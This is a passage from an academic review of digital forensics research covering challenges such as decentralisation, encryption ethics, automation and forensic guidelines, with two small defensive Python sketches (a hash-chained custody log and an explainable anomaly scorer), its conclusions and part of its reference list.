Beyond standards and methods, there is a definite need for industry players, developers, system administrators, etc., to foster a culture of forensic preparedness. Essentially, every organisation and resource provider must understand that its products and services are expected to suffer a successful cyber attack. Therefore, despite the countermeasures, recovery methods, and mitigation strategies, they need to implement policies and mechanisms that facilitate digital forensics. If the latter are not well-placed, while business continuity may not be severely harmed, one may not understand why and how the security event occurred and what needs to change, or may even miss important evidence of the threat actor.

3) DECENTRALISATION AND IMMUTABILITY
The wide adoption of distributed platforms, e.g. blockchain solutions [80] and distributed storage and filesystems, implies significant challenges for digital forensics [239], [240]. Some of these structures have strong privacy guarantees and can be leveraged to exfiltrate data, orchestrate malicious campaigns [241]-[244], or siphon fraudulent payments [245]. Traditional logging mechanisms and access control systems, which allow an investigator to assess who, when, how or even from where, are not relevant for many of these technologies. As a result, they are continuously abused by threat actors. These huge obstacles for digital forensics require further research in the field and the development of more targeted tools to extend the capabilities of digital investigators. In this regard, while the use of distributed platforms is not exempt from potential issues [240], they can also be used to leverage community-based intelligence against threats and to enable auditable forensic investigations [82], [246]-[248]. Following this idea, and in order to accelerate the response towards sophisticated threats and international campaigns, the community is devoting research efforts towards federated learning models [249], [250] and other emerging topics such as cognitive security [251], [252].
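To illustrate how immutability can be put to work for auditable investigations, the sketch below reduces the blockchain-based chain-of-custody idea to a minimal single-party hash chain. It is a toy model under stated assumptions, not the scheme of any cited work: every custody entry commits to the digest of its predecessor, so a later edit breaks verification.

```python
"""Minimal sketch of a hash-chained custody log for evidence-handling events.

Far simpler than the blockchain-based chain-of-custody proposals discussed
above (no distributed consensus, no multiple parties), but it shows the core
idea: each entry commits to the previous one, making silent edits detectable.
"""
import hashlib
import json
from datetime import datetime, timezone

GENESIS = "0" * 64


def _entry_hash(entry: dict) -> str:
    """Hash the canonical JSON form of one custody entry."""
    canonical = json.dumps(entry, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).hexdigest()


def append_event(chain: list[dict], actor: str, action: str, evidence_id: str) -> None:
    """Append one custody event linked to the hash of the previous entry."""
    entry = {
        "prev_hash": _entry_hash(chain[-1]) if chain else GENESIS,
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "actor": actor,
        "action": action,
        "evidence_id": evidence_id,
    }
    chain.append(entry)


def verify(chain: list[dict]) -> bool:
    """Recompute every link; a single altered field invalidates the rest of the chain."""
    expected = GENESIS
    for entry in chain:
        if entry["prev_hash"] != expected:
            return False
        expected = _entry_hash(entry)
    return True


if __name__ == "__main__":
    log: list[dict] = []
    append_event(log, "examiner-01", "acquired disk image", "EV-2022-014")
    append_event(log, "examiner-02", "opened image read-only", "EV-2022-014")
    print("chain valid:", verify(log))
```

Anchoring such per-case chains in a shared ledger (as the cited proposals do) is what would turn this single-party audit trail into a multi-party, tamper-evident record.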
4) DATA PROTECTION AND ETHICS IN CRIMINAL INVESTIGATIONS
Ransomware may be regarded as the most obvious case of exploiting cryptographic primitives for malicious acts; nevertheless, it is by no means the only one. Threat actors and cybercriminals, for instance, use encrypted and even covert channels to communicate, further hindering investigations. The latter has sparked a huge debate, as many are promoting concepts such as ``responsible encryption'' (https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-delivers-remarks-encryption-united-states-naval) with the adoption of, e.g., weakened encryption, cryptographic schemes such as key escrow, backdooring of cryptographic primitives, etc. [253]-[256]. While they may facilitate digital investigations, they essentially undermine the scope of cryptography and security, opening the door to many interpretations of what lawful interception is, when it can be performed and by whom, let alone the exploitation of the mechanisms by malicious actors, as the backdoor would already be implanted. The debate is ongoing and spans multiple sectors beyond digital forensics. While fostering such approaches may greatly benefit digital forensics, the ethical and legal implications hinder their adoption, and they are received by the security community with scepticism.

As discussed, anti-forensics methods are a challenge for almost all domains of digital forensics. Nevertheless, with the growing adoption of TPM and TEE, these challenges can be significantly augmented. For instance, as illustrated by Dunn et al. [257], ransomware can exploit these technologies to render decryption key extraction impossible. It is clear that these technologies introduce significant challenges for digital investigators, since they may deprive them of access to critical information. In this regard, it is essential to study methods for, e.g., live forensics in the presence of TPM and TEE and to explore how the missing information can be compensated.

5) AUTOMATION AND EXPLAINABILITY
The continuous increase in reported cybercrimes, apart from its impact on the victims, implies a lot of effort from investigators to analyse the cases. Therefore, the automation of digital forensics inevitably becomes a need. While automated methods for collecting log files and algorithms to identify anomalies or even to correlate some events may exist, this does not practically translate to automated digital forensics. Even if one does not consider APT attacks, one must understand that each case has particularities differentiating it from the others. Moreover, a digital investigator has to fill in the gaps of missing information that the attacker managed to cover, including information that security mechanisms failed to record or reported erroneously. The above implies the development of advanced machine learning and AI algorithms and tools that will underpin future digital forensics investigations. An important part of these systems is undoubtedly understanding the scope of the investigation and the explainability of the results [258], which is critical to assess the impact of current investigations and quantify their effectiveness [14], a critical step to ensure the implementation of the proper measures.
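As a minimal illustration of explainable automation, the sketch below scores invented per-host log features with plain z-scores, so that every flag can be justified in human-readable terms rather than emerging from an opaque model. The feature names, baseline counts, and threshold are assumptions made for this example; real investigations would require far richer models and data.

```python
"""Minimal sketch of transparent anomaly scoring over log-derived features.

The per-host daily counts are invented for illustration. A plain z-score per
feature is used instead of an opaque model, so the output can state *which*
behaviour deviated and by how much, in the human-readable spirit discussed above.
"""
from statistics import mean, pstdev

FEATURES = ["failed_logins", "outbound_mb", "new_processes"]

# Hypothetical daily counts per host, e.g. aggregated from collected logs.
BASELINE = {
    "host-a": [3, 120, 40],
    "host-b": [1, 95, 35],
    "host-c": [2, 110, 42],
    "host-d": [4, 130, 38],
}
OBSERVED = {"host-e": [38, 900, 41]}


def explain_anomalies(threshold: float = 3.0) -> None:
    """Flag features whose z-score against the baseline exceeds the threshold."""
    for idx, feature in enumerate(FEATURES):
        values = [counts[idx] for counts in BASELINE.values()]
        mu, sigma = mean(values), pstdev(values) or 1.0  # avoid division by zero
        for host, counts in OBSERVED.items():
            z = (counts[idx] - mu) / sigma
            if abs(z) >= threshold:
                print(f"{host}: {feature}={counts[idx]} deviates {z:.1f} standard "
                      f"deviations from the baseline mean of {mu:.1f}")


if __name__ == "__main__":
    explain_anomalies()
```

The trade-off is deliberate: a transparent statistic is far weaker than a learned model, but its verdicts can be narrated and challenged, which matters once automated findings have to be defended as evidence.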
Explainability is a crucial part of the AI and machine learning modules to be introduced, because for a piece of evidence to be admissible in a court of law, one has to justify not only how and from where it has been collected, but also prove its relevance to the case, how it was used, and why it is linked with the rest of the evidence. In essence, future digital forensics systems would have to argue and reason about the collected information in a human-readable manner. This is a huge step forward compared to the existing state, where systems prioritise log events and present analysts with known malicious patterns in the logs, malicious binaries, or connections that deviate from specific norms.

6) FORENSIC GUIDELINES AND BEST PRACTICES
One of the main strategies to reduce the impact of cybercrime is to implement the recommendations of the security guidelines and directives developed by agencies such as ENISA and NIST. The current threat landscape [6], which includes ransomware, malware, and threats against data availability and veracity, affects digital forensics in different dimensions, regardless of the topic. NIST recently published a state-of-the-art analysis of cloud-related challenges [34], which is aligned with the claims collected in the cloud-based digital forensics literature reviews discussed in Section III-A. In the case of networks, ENISA elaborated an extensive set of security objectives and discussed them along with their corresponding recommended measures in the topics of electronic communications [259] as well as 5G networks [260]. NIST provides security guidelines for managing mobile devices in its draft SP 800-124 (rev. 2) [261]. The recommendations cover scenarios from organization-provided to personally-owned devices and describe technologies and strategies that can be used as countermeasures and mitigations. In the context of IoT, NIST released a set of documents related to IoT device cybersecurity, covering aspects from the design and manufacturing of the components to their disposal [262]. In parallel, ENISA also proposed a comprehensive set of security guidelines targeting all the entities involved in the IoT supply chain to improve security decisions when designing, building, deploying, and assessing IoT technologies [263]. Concerning data storage and data processing, several guidelines have been proposed during the past years to reduce data breaches [264] and to promote the proper deployment of data storage mechanisms that enable privacy by design [265]-[267] and forensic readiness [268]. Finally, despite the existence of such guidelines, forensic frameworks accommodating procedures adapted to novel types of cybercrime, such as in, e.g., social networks [269], and the proper review and evaluation of an investigation process are necessary to assess the quality of forensic investigations [270].

VI. CONCLUSION AND FINAL REMARKS
The digitisation of our daily lives is a double-edged sword, as beyond the myriad of advantages and comforts it provides, it introduces security and privacy issues. Motivated by the lack of a general view of the digital forensics ecosystem, mainly because different topics are explored in an isolated way, and aiming to answer several research questions/concerns, this manuscript seeks to fill a literature gap by proposing a review of reviews in the field of digital forensics. Following a thorough research methodology, we identified the main digital forensics topics.
We developed a taxonomy by documenting the current state of the art and practice and the main challenges in each of them. Moreover, we analysed these challenges from a cross-domain perspective to highlight their relevance according to how often they were discussed in the literature. According to the outcomes (see Section III-I), such analysis provided us with enough evidence to show that the digital forensics community could benefit from closer collaborations and cross-topic research, since it appears that researchers are trying to find solutions to the same problems in parallel, sometimes without noticing it. By merging the information of Table 10 and Figure 4, we extracted the number of cross-domain challenges that each topic has in each forensic phase, and reported them in Table 18. As can be observed, data acquisition, along with investigation and forensic analysis, are the phases that entail more challenges, according to the research community. If we analyse the data at a topic level, we can observe that IoT has many challenges to overcome in such phases. The same applies to multimedia and mobile forensics. Since we focus on the challenges extracted from our literature review, the fact that some challenges have not been highlighted either at the topic or the forensic phase level may indicate that researchers and practitioners have not devoted enough effort to them, or perhaps highlights a lack of discussion about them. Such interesting domains include value chain and financial forensics. Like other domains, the business sector's ongoing digitisation means that sound value chain forensics mechanisms will be almost a necessity within any corporate strategy in the years to come. Therefore, the potentially unexplored issues in such cases require proactive initiatives before they become obstacles in the near future.

TABLE 18. Limitations per topic according to each phase as depicted in Figure 4.

Further to merely listing the state of practice and proposing research directions according to the identified challenges, we analysed crucial aspects of digital forensics such as standards, forensic readiness, and forensic reporting, and discussed the ethical and legal aspects of data management in Europe in Section IV. The insights gathered from such analysis, which were represented in the form of structured tables, qualitative literature analysis, and a proposed representation of forensic report content, successfully answered the research questions presented in Table 1. Finally, we discussed the main takeaways of this article and showcased several challenges that the digital forensics community will face in the upcoming years in Section V. In this regard, we proposed some ideas to prevent and/or overcome them, while recalling the need to design efficient and cross-domain strategies, since the latter will guarantee faster and more robust outcomes, hopefully minimising the impact of criminal activities.

Notably, some limitations of our approach are worth mentioning. Since our article is a review of reviews, we may have missed some recent advances and challenges if these have not yet been covered by recent surveys. Moreover, we only considered peer-reviewed journals, which may have lessened our approach's comprehensive and interdisciplinary nature.
However, we opted for this methodology since literature reviews are usually mature, long-term works that are not likely to be published in conferences, as they do not require fast positioning. By discussing the open issues and future trends in digital forensics, and after observing that many of the challenges raised years ago are still not solved, we believe that our literature analysis reflects with high fidelity the current state of practice and the potential challenges that may arise in the years to come, providing fruitful ground for research.

The inherent cross-jurisdiction nature of modern cybercrime, paired with the abuse of cutting-edge technologies, mandates more coordinated efforts from the security and research community. With the continuously increasing amount of data that has to be analysed, it is clear that manual analysis is almost at its limits. The use of fine-grained IoCs may significantly reduce the effort of the investigator. However, as already discussed, this is not always possible, especially when non-traditional computing devices are used, e.g. IoT, mobile, cloud. As a result, machine learning and artificial intelligence are gradually being integrated into the logic of many tools and methods. Nevertheless, reasoning about the results in a human-understandable manner is a cross-domain challenge. Moreover, the standardisation of digital forensics processes for cloud, mobile, IoT, drones, etc., is becoming a high priority, since they are an indispensable part of almost all modern digital investigations. Finally, the consensus on developing these standards and the coordinated efforts made over the past few years for countering cybercrime must be leveraged to homogenise legislation across jurisdictions and facilitate digital investigations. A common answer to the problem, using the same measures, would create a strong response against cybercrime and improve the response time to security incidents and their analysis.

ACKNOWLEDGMENT
The content of this article does not reflect the official opinion of the European Union. Responsibility for the information and views expressed therein lies entirely with the authors.

REFERENCES
[1] J. I. Thornton and J. Peterson, ``The general assumptions and rationale of forensic identification,'' Modern scientific evidence: Law Sci. expert testimony, vol. 2, p. 13, 1997.
[2] E. Locard, Manuel de Technique Policière: Les Constats, les Empreintes Digitales, 2nd ed. Paris, France: Payot, 1934.
[3] F. L. Wellman and H. Münsterberg, ``The art of cross-examination,'' Amer. Bar Assoc. J., vol. 10, no. 4, p. 249, 1924. [Online]. Available: http://www.jstor.org/stable/25711556
[4] M. Pollitt, ``A history of digital forensics,'' in IFIP International Conference on Digital Forensics. Berlin, Germany: Springer, 2010, pp. 315.
[5] (2019). I. G. C. for Innovation. Global Guidelines for Digital Forensics Laboratories. [Online]. Available: https://www.interpol.int/content/download/13501/file/INTERPOL_DFL_GlobalGuidelinesDigitalForensicsLaboratory.pdf
[6] (2021). The European Union Agency for Cybersecurity (ENISA). ENISA Threat Landscape 2021. [Online]. Available: https://www.enisa.europa.eu/publications/enisa-threat-landscape-2021
[7] P. Purnaye and V. Kulkarni, ``A comprehensive study of cloud forensics,'' Arch. Comput. Methods Eng., vol. 29, no. 1, pp. 114, 2021.
[8] C. Pasquini, I. Amerini, and G.
Boato, ``Media forensics on social media platforms: A survey,'' EURASIP J. Inf. Secur., vol. 2021, no. 1, pp. 119, Dec. 2021.
[9] K. Nance, H. Armstrong, and C. Armstrong, ``Digital forensics: Defining an education agenda,'' in Proc. 43rd Hawaii Int. Conf. Syst. Sci., 2010, pp. 110.
[10] A. M. Marshall, ``Quality standards and regulation: Challenges for digital forensics,'' Meas. Control, vol. 43, no. 8, pp. 243247, Oct. 2010.
[11] P. S. Chen, L. M. Tsai, Y.-C. Chen, and G. Yee, ``Standardizing the construction of a digital forensics laboratory,'' in Proc. 1st Int. Workshop Systematic Approaches Digit. Forensic Eng. (SADFE), Nov. 2005, pp. 4047.
[12] A. Varol and Y. Ü. Sönmez, ``Review of evidence collection and protection phases in digital forensics process,'' Int. J. Inf. Secur. Sci., vol. 6, no. 4, pp. 3946, 2017.
[13] A. H. Lone and R. N. Mir, ``Forensic-chain: Blockchain based digital forensics chain of custody with PoC in hyperledger composer,'' Digit. Invest., vol. 28, pp. 4455, Mar. 2019.
[14] R. E. Overill and J. Collie, ``Quantitative evaluation of the results of digital forensic investigations: A review of progress,'' Forensic Sci. Res., vol. 6, no. 1, pp. 1318, Jan. 2021.
[15] K. A. Z. Ariffin and F. H. Ahmad, ``Indicators for maturity and readiness for digital forensic investigation in era of industrial revolution 4.0,'' Comput. Secur., vol. 105, Jun. 2021, Art. no. 102237.
[16] M. Fire and C. Guestrin, ``Over-optimization of academic publishing metrics: Observing Goodhart's law in action,'' GigaScience, vol. 8, no. 6, Jun. 2019.
[17] H. Hunt, A. Pollock, P. Campbell, L. Estcourt, and G. Brunton, ``An introduction to overviews of reviews: Planning a relevant research question and objective for an overview,'' Systematic Rev., vol. 7, no. 1, pp. 19, Dec. 2018.
[18] J. E. McKenzie and S. E. Brennan, ``Overviews of systematic reviews: Great promise, greater challenge,'' Systematic Rev., vol. 6, no. 1, pp. 14, Dec. 2017.
[19] E. Aromataris, R. Fernandez, C. M. Godfrey, C. Holly, H. Khalil, and P. Tungpunkom, ``Summarizing systematic reviews: Methodological development, conduct and reporting of an umbrella review approach,'' Int. J. Evidence Based Healthcare, vol. 13, no. 3, pp. 132140, 2015.
[20] M. Pollock, R. M. Fernandes, D. Pieper, A. C. Tricco, M. Gates, A. Gates, and L. Hartling, ``Preferred reporting items for overviews of reviews (PRIOR): A protocol for development of a reporting guideline for overviews of reviews of healthcare interventions,'' Systematic Rev., vol. 8, no. 1, pp. 19, Dec. 2019.
[21] D. Denyer and D. Tranfield, ``Producing a systematic review,'' in The Sage Handbook of Organizational Research Methods. Los Angeles, CA, USA: SAGE, 2009, pp. 671689.
[22] R. Pranckutė, ``Web of science (WoS) and scopus: The titans of bibliographic information in today's academic world,'' Publications, vol. 9, no. 1, p. 12, Mar. 2021.
[23] J. vom Brocke, A. Simons, K. Riemer, B. Niehaves, R. Plattfaut, and A. Cleven, ``Standing on the shoulders of giants: Challenges and recommendations of literature search in information systems research,'' Commun. Assoc. Inf. Syst., vol. 37, no. 1, p. 9, 2015.
[24] M. E. Alex and R. Kishore, ``Forensics framework for cloud computing,'' Comput. Elect. Eng., vol. 60, pp. 193205, May 2017.
[25] M. Khanafseh, M. Qatawneh, and W. Almobaideen, ``A survey of various frameworks and solutions in all branches of digital forensics with a focus on cloud forensics,'' Int. J. Adv. Comput. Sci. Appl., vol. 10, no. 8, pp. 610629, 2019.
[26] A.
Pichan, M. Lazarescu, and S. T. Soh, ``Cloud forensics: Technical challenges, solutions and comparative analysis,'' Digit. Invest., vol. 13, pp. 3857, Jun. 2015.
[27] G. Palmer et al., ``A road map for digital forensic research,'' in Proc. 1st Digit. Forensic Res. Workshop, New York, NY, USA, 2001, pp. 2730.
[28] K. Ruan, J. Carthy, T. Kechadi, and I. Baggili, ``Cloud forensics definitions and critical criteria for cloud forensic capability: An overview of survey results,'' Digit. Invest., vol. 10, no. 1, pp. 3443, 2013.
[29] S. Park, Y. Kim, G. Park, O. Na, and H. Chang, ``Research on digital forensic readiness design in a cloud computing-based smart work environment,'' Sustainability, vol. 10, no. 4, p. 1203, Apr. 2018.
[30] S. Simou, C. Kalloniatis, S. Gritzalis, and H. Mouratidis, ``A survey on cloud forensics challenges and solutions,'' Secur. Commun. Netw., vol. 9, no. 18, pp. 62856314, Dec. 2016.
[31] A. Aminnezhad, A. Dehghantanha, M. T. Abdullah, and M. Damshenas, ``Cloud forensics issues and opportunities,'' Int. J. Inf. Process. Manage., vol. 4, no. 4, pp. 7685, Jun. 2013.
[32] N. H. A. Rahman and K.-K. R. Choo, ``A survey of information security incident handling in the cloud,'' Comput. Secur., vol. 49, pp. 4569, Mar. 2015.
[33] B. Manral, G. Somani, K.-K.-R. Choo, M. Conti, and M. S. Gaur, ``A systematic survey on cloud forensics challenges, solutions, and future directions,'' ACM Comput. Surv., vol. 52, no. 6, pp. 138, Nov. 2020.
[34] N. I. of Standards and Technology. (2020). NISTIR 8006 NIST Cloud Computing Forensic Science Challenges. [Online]. Available: https://nvlpubs.nist.gov/nistpubs/ir/2020/NIST.IR.8006.pdf
[35] A. Alenezi, H. F. Atlam, and G. B. Wills, ``Experts reviews of a cloud forensic readiness framework for organizations,'' J. Cloud Comput., vol. 8, no. 1, Dec. 2019.
[36] E. S. Pilli, R. C. Joshi, and R. Niyogi, ``Network forensic frameworks: Survey and research challenges,'' Digit. Invest., vol. 7, nos. 12, pp. 1427, Oct. 2010.
[37] (2020). N. T. S. Coalition. Cybersecurity Report 2020. [Online]. Available: https://www.ntsc.org/assets/pdfs/cyber-security-report-2020.pdf
[38] C. Patsakis, F. Casino, N. Lykousas, and V. Katos, ``Unravelling Ariadne's thread: Exploring the threats of decentralised DNS,'' IEEE Access, vol. 8, pp. 118559118571, 2020.
[39] N. Hoque, M. H. Bhuyan, R. C. Baishya, D. K. Bhattacharyya, and J. K. Kalita, ``Network attacks: Taxonomy, tools and systems,'' J. Netw. Comput. Appl., vol. 40, pp. 307324, Apr. 2014.
[40] S. Khan, A. Gani, A. W. A. Wahab, M. Shiraz, and I. Ahmad, ``Network forensics: Review, taxonomy, and open challenges,'' J. Netw. Comput. Appl., vol. 66, pp. 214235, May 2016.
[41] A. Nisioti, A. Mylonas, P. D. Yoo, and V. Katos, ``From intrusion detection to attacker attribution: A comprehensive survey of unsupervised methods,'' IEEE Commun. Surveys Tuts., vol. 20, no. 4, pp. 33693388, 4th Quart., 2018.
[42] F. Sharevski, ``Towards 5G cellular network forensics,'' EURASIP J. Inf. Secur., vol. 2018, no. 1, p. 8, Dec. 2018.
[43] D. Takahashi, Y. Xiao, Y. Zhang, P. Chatzimisios, and H.-H. Chen, ``IEEE 802.11 user fingerprinting and its applications for intrusion detection,'' Comput. Math. Appl., vol. 60, no. 2, pp. 307318, Jul. 2010.
[44] L. F. Sikos, ``Packet analysis for network forensics: A comprehensive survey,'' Forensic Sci. Int., Digit. Invest., vol. 32, Mar. 2020, Art. no. 200892.
[45] I. R. Adeyemi, S. A. Razak, and N. A. N. Azhan, ``A review of current research in network forensic analysis,'' Int. J. Digit.
Crime Forensics, vol. 5, no. 1, pp. 126, Jan. 2013.
[46] A. A. Ahmed and N. A. K. Zaman, ``Attack intention recognition: A review,'' IJ Netw. Secur., vol. 19, no. 2, pp. 244250, 2017.
[47] H.-C. Chu, D.-J. Deng, and H.-C. Chao, ``Potential cyberterrorism via a multimedia smart phone based on a Web 2.0 application via ubiquitous Wi-Fi access points and the corresponding digital forensics,'' Multimedia Syst., vol. 17, no. 4, pp. 341349, Jul. 2011.
[48] K. Barmpatsalou, T. Cruz, E. Monteiro, and P. Simoes, ``Current and future trends in mobile device forensics: A survey,'' ACM Comput. Surv., vol. 51, no. 3, pp. 131, 2018.
[49] A. Farjamfar, M. T. Abdullah, R. Mahmod, and N. Izura Udzir, ``A review on mobile device's digital forensic process models,'' Res. J. Appl. Sci., Eng. Technol., vol. 8, no. 3, pp. 358366, Jul. 2014.
[50] K. Barmpatsalou, D. Damopoulos, G. Kambourakis, and V. Katos, ``A critical review of 7 years of mobile device forensics,'' Digit. Invest., vol. 10, no. 4, pp. 323349, Dec. 2013.
[51] X. Wan, J. He, G. Liu, N. Huang, X. Zhu, B. Zhao, and Y. Mai, ``Survey of digital forensics technologies and tools for Android based intelligent devices,'' Int. J. Digit. Crime Forensics, vol. 7, no. 1, pp. 125, Jan. 2015.
[52] J. Hou, Y. Li, J. Yu, and W. Shi, ``A survey on digital forensics in Internet of Things,'' IEEE Internet Things J., vol. 7, no. 1, pp. 115, Jan. 2020.
[53] M. Stoyanova, Y. Nikoloudakis, S. Panagiotakis, E. Pallis, and E. K. Markakis, ``A survey on the Internet of Things (IoT) forensics: Challenges, approaches, and open issues,'' IEEE Commun. Surveys Tuts., vol. 22, no. 2, pp. 11911221, 2nd Quart., 2020.
[54] R. Kamal, E. E.-D. Hemdan, and N. El-Fishway, ``A review study on blockchain-based IoT security and forensics,'' Multimedia Tools Appl., vol. 80, pp. 132, Sep. 2021.
[55] H. F. Atlam, E. El-Din Hemdan, A. Alenezi, M. O. Alassafi, and G. B. Wills, ``Internet of Things forensics: A review,'' Internet Things, vol. 11, Sep. 2020, Art. no. 100220.
[56] P. Lutta, M. Sedky, M. Hassan, U. Jayawickrama, and B. B. Bastaki, ``The complexity of Internet of Things forensics: A state-of-the-art review,'' Forensic Sci. Int., Digit. Invest., vol. 38, Sep. 2021, Art. no. 301210.
[57] A. Sayakkara, N.-A. Le-Khac, and M. Scanlon, ``A survey of electromagnetic side-channel attacks and discussion on their case-progressing potential for digital forensics,'' Digit. Invest., vol. 29, pp. 4354, Jun. 2019.
[58] A. E. Omolara, A. Alabdulatif, O. I. Abiodun, M. Alawida, A. Alabdulatif, W. H. Alshoura, and H. Arshad, ``The Internet of Things security: A survey encompassing unexplored areas and new insights,'' Comput. Secur., vol. 112, Jan. 2022, Art. no. 102494.
[59] O. Yakubu, N. C. Babu, and O. Adjei, ``A review of digital forensic challenges in the Internet of Things (IoT),'' Int. J. Mech. Eng. Technol., vol. 9, no. 1, pp. 915923, 2018.
[60] N. Koroniotis, N. Moustafa, and E. Sitnikova, ``Forensics and deep learning mechanisms for botnets in Internet of Things: A survey of challenges and solutions,'' IEEE Access, vol. 7, pp. 6176461785, 2019.
[61] A. Ross, S. Banerjee, and A. Chowdhury, ``Security in smart cities: A brief review of digital forensic schemes for biometric data,'' Pattern Recognit. Lett., vol. 138, pp. 346354, Oct. 2020.
[62] H. Studiawan, F. Sohel, and C. Payne, ``A survey on forensic investigation of operating system logs,'' Digit.
Invest., vol. 29, pp. 120, Jun. 2019.
[63] S. Khan, A. Gani, A. W. A. Wahab, M. A. Bagiwa, M. Shiraz, S. U. Khan, R. Buyya, and A. Y. Zomaya, ``Cloud log forensics: Foundations, state of the art, and future directions,'' ACM Comput. Surveys, vol. 49, no. 1, pp. 142, Mar. 2017.
[64] R. A. Awad, S. Beztchi, J. M. Smith, B. Lyles, and S. Prowell, ``Tools, techniques, and methodologies: A survey of digital forensics for SCADA systems,'' in Proc. 4th Annu. Ind. Control Syst. Secur. Workshop, 2018, pp. 18.
[65] M. Botacin, P. L. D. Geus, and A. Grégio, ``Who watches the watchmen: A security-focused review on current state-of-the-art techniques, tools, and methods for systems and binary analysis on modern platforms,'' ACM Comput. Surv., vol. 51, no. 4, pp. 134, Jul. 2019.
[66] T. Latzo, R. Palutke, and F. Freiling, ``A universal taxonomy and survey of forensic memory acquisition techniques,'' Digit. Invest., vol. 28, pp. 5669, Mar. 2019.
[67] G. Osbourne, ``Memory forensics: Review of acquisition and analysis techniques,'' Defence Sci. Technol. Organisation Edinburgh (Australia) Cyber Electron. Warfare Div, Tech. Rep., 2013.
[68] A. Case and G. G. Richard, ``Memory forensics: The path forward,'' Digit. Invest., vol. 20, pp. 2333, Mar. 2017.
[69] A. Al-Dhaqm, S. A. Razak, D. A. Dampier, K.-K. R. Choo, K. Siddique, R. A. Ikuesan, A. Alqarni, and V. R. Kebande, ``Categorization and organization of database forensic investigation processes,'' IEEE Access, vol. 8, pp. 112846112858, 2020.
[70] O. M. Adedayo and M. S. Olivier, ``Ideal log setting for database forensics reconstruction,'' Digit. Invest., vol. 12, pp. 2740, Mar. 2015.
[71] R. Chopade and V. K. Pachghare, ``Ten years of critical review on database forensics research,'' Digit. Invest., vol. 29, pp. 180197, Jun. 2019.
[72] W. K. Hauger and M. S. Olivier, ``NOSQL databases: Forensic attribution implications,'' SAIEE Afr. Res. J., vol. 109, no. 2, pp. 119132, Jun. 2018.
[73] V. Jusas, D. Birvinskas, and E. Gahramanov, ``Methods and tools of digital triage in forensic context: Survey and future directions,'' Symmetry, vol. 9, no. 4, p. 49, Mar. 2017.
[74] A. Al-Dhaqm, S. Razak, R. A. Ikuesan, V. R. Kebande, and S. Hajar Othman, ``Face validation of database forensic investigation metamodel,'' Infrastructures, vol. 6, no. 2, p. 13, Jan. 2021.
[75] I. Sutherland, J. Evans, T. Tryfonas, and A. J. C. Blyth, ``Acquiring volatile operating system data tools and techniques,'' Operating Syst. Rev., vol. 42, pp. 6573, Apr. 2008.
[76] N. Beebe and J. Clark, ``Dealing with terabyte data sets in digital investigations,'' in Proc. IFIP Int. Fed. Inf. Process., vol. 194, 2006, pp. 316.
[77] D. Quick and K.-K.-R. Choo, ``Impacts of increasing volume of digital forensic data: A survey and future research challenges,'' Digit. Invest., vol. 11, no. 4, pp. 273294, Dec. 2014.
[78] B. Almaslukh, ``Forensic analysis using text clustering in the age of large volume data: A review,'' Int. J. Adv. Comput. Sci. Appl., vol. 10, no. 6, pp. 7176, 2019.
[79] V. H. G. Moia and M. A. A. Henriques, ``Similarity digest search: A survey and comparative analysis of strategies to perform known file filtering using approximate matching,'' Secur. Commun. Netw., vol. 2017, pp. 117, 2017.
[80] F. Casino, T. Dasaklis, and C. Patsakis, ``A systematic literature review of blockchain-based applications: Current status, classification and open issues,'' Telematics Inform., vol. 36, pp. 5581, Mar. 2019.
[81] B. Shanmugam, S. Azam, K. C. Yeo, J. Jose, and K.
Kannoorpatti, ``A critical review of bitcoins usage by cybercriminals,'' in Proc. Int. Conf. Comput. Commun. Informat. (ICCCI), Jan. 2017, pp. 17.
[82] T. K. Dasaklis, F. Casino, and C. Patsakis, ``SoK: Blockchain solutions for forensics,'' in Technology Development for Security Practitioners. Cham, Switzerland: Springer, 2021.
[83] A. Balaskas and V. N. L. Franqueira, ``Analytical tools for blockchain: Review, taxonomy and open challenges,'' in Proc. Int. Conf. Cyber Secur. Protection Digit. Services (Cyber Security), Jun. 2018, pp. 18.
[84] A. Turner and A. S. M. Irwin, ``Bitcoin transactions: A digital discovery of illicit activity on the blockchain,'' J. Financial Crime, vol. 25, no. 1, pp. 109130, Jan. 2018.
[85] H. Chen, M. Pendleton, L. Njilla, and S. Xu, ``A survey on Ethereum systems security: Vulnerabilities, attacks, and defenses,'' ACM Comput. Surv., vol. 53, no. 3, pp. 143, May 2021.
[86] I. Homoliak, S. Venugopalan, D. Reijsbergen, Q. Hum, R. Schumi, and P. Szalachowski, ``The security reference architecture for blockchains: Toward a standardized model for studying vulnerabilities, threats, and defenses,'' IEEE Commun. Surveys Tuts., vol. 23, no. 1, pp. 341390, 1st Quart., 2021.
[87] Z. Wang, H. Jin, W. Dai, K.-K.-R. Choo, and D. Zou, ``Ethereum smart contract security research: Survey and future research opportunities,'' Frontiers Comput. Sci., vol. 15, no. 2, Apr. 2021, Art. no. 152802.
[88] W. Koerhuis, T. Kechadi, and N.-A. Le-Khac, ``Forensic analysis of privacy-oriented cryptocurrencies,'' Forensic Sci. Int., Digit. Invest., vol. 33, Jun. 2020, Art. no. 200891.
[89] M. Saad, J. Spaulding, L. Njilla, C. Kamhoua, S. Shetty, D. Nyang, and D. Mohaisen, ``Exploring the attack surface of blockchain: A comprehensive survey,'' IEEE Commun. Surveys Tuts., vol. 22, no. 3, pp. 19772008, 3rd Quart., 2020.
[90] E. Deirmentzoglou, G. Papakyriakopoulos, and C. Patsakis, ``A survey on long-range attacks for proof of stake protocols,'' IEEE Access, vol. 7, pp. 2871228725, 2019.
[91] H. Farid, ``Image forgery detection,'' IEEE Signal Process. Mag., vol. 26, no. 2, pp. 1625, Mar. 2009.
[92] K. A. P. da Costa, J. P. Papa, L. A. Passos, D. Colombo, J. D. Ser, K. Muhammad, and V. H. C. de Albuquerque, ``A critical literature survey and prospects on tampering and anomaly detection in image data,'' Appl. Soft Comput., vol. 97, Dec. 2020, Art. no. 106727.
[93] A. H. Saber, M. A. Khan, and B. G. Mejbel, ``A survey on image forgery detection using different forensic approaches,'' Adv. Sci., Technol. Eng. Syst. J., vol. 5, no. 3, pp. 361370, 2020.
[94] L. Zheng, Y. Zhang, and L. Vrizlynn, ``A survey on image tampering and its detection in real-world photos,'' J. Vis. Commun. Image Represent., vol. 58, pp. 380399, Jan. 2019.
[95] S. Bourouis, R. Alroobaea, A. Alharbi, M. Andejany, and S. Rubaiee, ``Recent advances in digital multimedia tampering detection for forensics analysis,'' Symmetry, vol. 12, no. 11, pp. 126, 2020.
